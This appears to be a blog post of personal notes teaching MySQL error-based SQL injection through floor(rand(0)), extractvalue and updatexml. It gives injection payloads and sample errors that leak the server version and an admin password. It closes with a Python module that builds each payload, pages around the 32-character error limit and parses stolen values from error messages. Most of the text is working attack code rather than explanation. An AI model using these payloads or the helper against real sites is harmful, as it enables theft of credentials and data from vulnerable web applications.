Posting some of my old notes here. When MySQL hits an error while executing a statement it throws an error message, and PHP+MySQL sites often print that error text straight onto the page, so the following three constructions can be used to pull specific data out of the error.
Test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()

Why it errors: GROUP BY evaluates the key expression once to look the group up in its temporary table and, when the group is not there yet, evaluates it again to insert it. rand(0) is a fixed sequence (floor(rand(0)*2) starts 0,1,1,0,1,1,...), so the second evaluation can differ from the first and the insert collides with a key that already exists, which MySQL reports as ERROR 1062. The derived table must supply at least three rows for the collision to occur; information_schema.tables has plenty, and the union of three selects in the second payload supplies exactly three.

The following payloads can be used (the first one must be parenthesised as a single condition after "and"):

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
Example:

First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked. The trailing 1 is the floor(rand(0)*2) digit that concat() appended, not part of the version string. To retrieve other data, replace version() with the desired subquery.
For example, to retrieve the admin username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue

Test payload:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

0x5c is a backslash; it makes the string an invalid XPath expression at the very first character, so the whole string is echoed back in the error. Note that the XPATH syntax error shows at most 32 characters, so longer values have to be read in pieces with substring().

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml

Test payload:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

0x5e24 is '^$', used as a delimiter on both sides so the value is easy to pick out of the error text; the same 32-character limit applies here.

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
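As an added example (not code from the original post), the following Python helpers put the three methods together: a small model of why floor(rand(0)*2) with GROUP BY collides and needs at least three rows, builders for the three payloads, a substring() pager for the 32-character XPath error limit, and a parser that recovers the leaked value from each error format. The names floor_payload, extractvalue_payload, updatexml_payload, paged, simulate_group_by and parse_error are my own, and the error strings are constructed to match the ones shown above rather than captured from a server.

```python
"""Helpers for MySQL error-based extraction.

Added example, not code from the original post. It assumes the three error
formats shown above (ERROR 1062 Duplicate entry / ERROR 1105 XPATH syntax
error) and the admin/article schema; every error string and the rand(0)
prefix below are constructed test data, not captured output.
"""
import re

# --- 1. why floor(rand(0)*2) with GROUP BY collides -------------------------
# rand(0) is a fixed sequence, so floor(rand(0)*2) always starts 0,1,1,0,1,1
RAND0_FLOOR_PREFIX = [0, 1, 1, 0, 1, 1]


def simulate_group_by(rows, key_seq=RAND0_FLOOR_PREFIX):
    """Model of GROUP BY filling its temporary table.

    The key expression is evaluated once to look the group up and, when the
    group is absent, evaluated AGAIN to insert it.  Returns the key that
    collided (MySQL raises ERROR 1062 at that point) or None if no error.
    """
    table = {}
    values = iter(key_seq)
    for _ in range(rows):
        k = next(values)           # evaluation used for the lookup
        if k in table:
            table[k] += 1
            continue
        k = next(values)           # re-evaluation used for the insert
        if k in table:
            return k               # duplicate key -> error
        table[k] = 1
    return None


# --- 2. payload builders ------------------------------------------------------
# `subquery` is a SELECT returning one value, e.g. "select pass from admin limit 1"
def floor_payload(subquery):
    return ("and (select 1 from (select count(*),concat((%s),floor(rand(0)*2))x "
            "from information_schema.tables group by x)a)" % subquery)


def extractvalue_payload(subquery):
    return "and extractvalue(1, concat(0x5c, (%s)))" % subquery  # 0x5c = '\'


def updatexml_payload(subquery):
    return "and 1=(updatexml(1,concat(0x5e24,(%s),0x5e24),1))" % subquery  # 0x5e24 = '^$'


XPATH_LIMIT = 32   # extractvalue/updatexml echo at most 32 characters


def paged(subquery, page):
    """Wrap `subquery` in substring() so a value longer than XPATH_LIMIT can be
    read page by page.  The 1-byte 0x5c delimiter uses one of the 32 slots,
    so each page carries XPATH_LIMIT - 1 characters (page numbers start at 1)."""
    width = XPATH_LIMIT - 1
    offset = (page - 1) * width + 1
    return "select substring((%s),%d,%d)" % (subquery, offset, width)


# --- 3. recovering the value from the error text ---------------------------
# MySQL 5.7+ prints the key as '<group_key>', older versions as 'group_key'
DUP_RE = re.compile(r"Duplicate entry '(.*)' for key '<?group_key>?'")
XPATH_RE = re.compile(r"XPATH syntax error: '(.*)'")


def parse_error(msg):
    """Return the leaked value from an error message, or None if the message
    is not one of the three formats."""
    m = DUP_RE.search(msg)
    if m:
        # concat() appended the floor(rand(0)*2) digit; drop it
        return m.group(1)[:-1]
    m = XPATH_RE.search(msg)
    if m:
        val = m.group(1)
        if val.startswith("^$"):          # updatexml delimiters
            val = val[2:]
            if val.endswith("^$"):        # may be cut off by the 32-char limit
                val = val[:-2]
        elif val.startswith("\\"):        # extractvalue delimiter
            val = val[1:]
        return val
    return None


if __name__ == "__main__":
    # constructed sample errors matching the ones shown on the page
    for err in [
        "ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'",
        "ERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
        "ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'",
    ]:
        print(parse_error(err))
    print(simulate_group_by(2), simulate_group_by(3))
```

simulate_group_by(2) returns None while simulate_group_by(3) returns the colliding key 1, which is the three-row requirement from section 1 in miniature. For a long value, feed paged(subquery, n) into extractvalue_payload for n = 1, 2, ... and join the parsed pieces; with the two-byte updatexml delimiter the page width would have to shrink to 30.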
That's all. Thanks to the foreign guys.